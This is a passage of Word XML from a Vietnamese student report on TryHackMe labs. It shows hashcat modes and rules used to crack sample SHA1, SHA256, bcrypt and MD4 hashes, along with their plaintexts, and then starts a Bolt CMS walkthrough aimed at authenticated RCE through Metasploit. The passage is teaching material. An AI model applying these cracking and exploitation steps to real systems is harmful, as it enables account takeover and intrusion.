                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5791200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C198C"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486E8338" wp14:editId="52ACE1C5">
            <wp:extent cx="5731200" cy="5384800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5384800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ECF8E8"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Chuẩn hash là Sha1 chế độ hash là 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C15CF73"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chuỗi trước khi hash là “password123”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC42938"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4D5E2805" wp14:editId="30321F69">
            <wp:extent cx="5731200" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E3D43" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="0"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Với chuỗi ký tự “1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B336B63032” ta cũng tiến hành làm 3 bước như trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1330E6BE"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0DEBBF96" wp14:editId="28219910">
            <wp:extent cx="5731200" cy="5168900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5168900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610D1BA"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2BF9BDCD" wp14:editId="26F323C9">
            <wp:extent cx="5731200" cy="5410200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5410200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4AAA14"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58B0A657" wp14:editId="0BEA4D06">
            <wp:extent cx="5731200" cy="4826000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4826000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BB57A"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Chuẩn hash là Sha256, chế độ hash là 1400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1DFEF5"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chuỗi trước khi hash là letmein</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CADDBD"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3699847F" wp14:editId="3A7CC125">
            <wp:extent cx="5731200" cy="368300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="368300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="772AC268" w14:textId="4339F26D" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA" w:rsidP="00C97D8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="0"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Với</w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>chuỗi</w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>”$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom”</w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>vì chuẩn hash này hơi đặc biệt nên ta sẽ tiến hành thêm dấu “\” trước mỗi ký tự”$”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E710079"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5F0A8D71" wp14:editId="32E1228F">
            <wp:extent cx="5731200" cy="4152900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4152900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="102C02FE"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01F7A11E" wp14:editId="13ECB539">
            <wp:extent cx="5731200" cy="1727200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1727200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="037B865F"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Chuẩn hash Bcrypt chế độ Hashcat: 3200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DE918D"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do máy ảo của em không dùng GPU để giải mã nên tốc độ giải sẽ lâu hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59829A0D"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Chuỗi trước khi hash là “bleh”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CB7AC"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7AF0FD75" wp14:editId="0A3879BA">
            <wp:extent cx="5731200" cy="406400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="406400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FEF7E2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0"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Với chuỗi “279412f945939ba78ce0758d3fd83daa”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05786E00"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33A290BD" wp14:editId="7E977707">
            <wp:extent cx="4829175" cy="4086225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4829175" cy="4086225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7820B8C2"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13BE359E" wp14:editId="031B9B6F">
            <wp:extent cx="5731200" cy="1536700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1536700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5CE49D"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Chuẩn hash MD4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB1181"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Chế độ Hashcat: 900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B8417"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Quy tắc: Best64.rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58273481"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do chuỗi trước khi hash chứa ký tự in hoa ở đầu chuỗi và số ở cuối chuỗi nên khi tìm trong file rockyou.txt sẽ không tìm thấy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73162402"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5526AB2B" wp14:editId="47817327">
            <wp:extent cx="5731200" cy="406400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="406400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33705730"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Task 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CDAD04"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4C2B8A8A" wp14:editId="3D6EB523">
            <wp:extent cx="5731200" cy="4457700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4457700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="287377D4"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5B27D3DC" wp14:editId="21F77817">
            <wp:extent cx="5731200" cy="3721100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3721100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C8BFC7"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2DC6C3AD" wp14:editId="3D4D9BF7">
            <wp:extent cx="5731200" cy="4254500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4254500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6072253C"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65651D95" wp14:editId="732CC893">
            <wp:extent cx="5731200" cy="4495800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4495800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B5706"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 xml:space="preserve">2.3. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C164E0E"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18179B60" wp14:editId="5CB081F9">
            <wp:extent cx="5731200" cy="635000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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09"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="635000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD56DD"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7A770DF6" wp14:editId="445F94C5">
            <wp:extent cx="5731200" cy="4114800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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10"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4114800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA25B8"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21DB33E4" wp14:editId="71628200">
            <wp:extent cx="5731200" cy="1727200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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11"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1727200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045B79E"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color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA215F2"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6B222179" wp14:editId="176B1951">
            <wp:extent cx="5731200" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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12"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4000500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E30ADD1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="02B703BC" wp14:editId="4216E577">
            <wp:extent cx="5731200" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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13"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C892103" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C4541F" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc90050793"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.5. Bolt walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="6DDBEF8B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc90050794"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.5.1. Yêu cầu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="29818FD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hử thách này chúng ta sẽ tiến hành trả lời các câu hỏi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7938E6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4788B60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Số cổng nào có máy chủ web với CMS đang chạy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BD238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Username chúng ta có thể tìm thấy trong CMS là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0805B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Mật khẩu chúng ta có thể tìm thấy cho username tương uwnsg là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF64D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Phiên bản CMS nào được cài đặt trên máy chủ? (Ví dụ: Tên 1.1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C6A8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Có một khai thác cho phiên bản trước của CMS này, cho phép RCE được xác thực. - - Tìm nó trên Exploit DB. EDB-ID của nó là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F1EB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Metasploit gần đây đã thêm một mô-đun khai thác cho lỗ hổng này. Đường dẫn đầy đủ cho việc khai thác này là gì? (Ví dụ: khai thác / ....)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF97D3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Đặt LHOST, LPORT, RHOST, USERNAME, PASSWORD  trong msfconsole trước khi chạy khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514565B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Tìm kiếm flag.txt bên trong máy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B38D9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc90050795"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.5.2. Công cụ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="3CA0DF3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openvpn để thiết lập kết nối với tryhackme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029FD03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metasploit để khai thác lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4802BCC5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc90050796"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.5.3. Các bước thực hiện</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="2C10AAA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1: thiết lập kết nối open vpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FDEC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lệnh: sudo openvpn [open vpn]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC13EE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Gói em đang sử dụng ở đây là gói AU-Regular-1 Australia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C97AF0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udo openvpn LeeCuong(2).vpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6222DB2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036DD97B" wp14:editId="283D0699">
            <wp:extent cx="5731200" cy="4864100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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14"/>
                    <a:srcRect/>
